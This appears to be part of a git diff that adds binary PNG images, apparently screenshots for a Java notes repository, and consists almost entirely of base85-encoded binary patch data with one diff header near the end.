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 
diff --git "a/java\346\227\245\345\270\270/img/image-20221220233047039.png" "b/java\346\227\245\345\270\270/img/image-20221220233047039.png" new file mode 100644 index 0000000000000000000000000000000000000000..9b6fda51251c1640b436117c124f60a529ac42ca GIT binary patch literal 130319
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 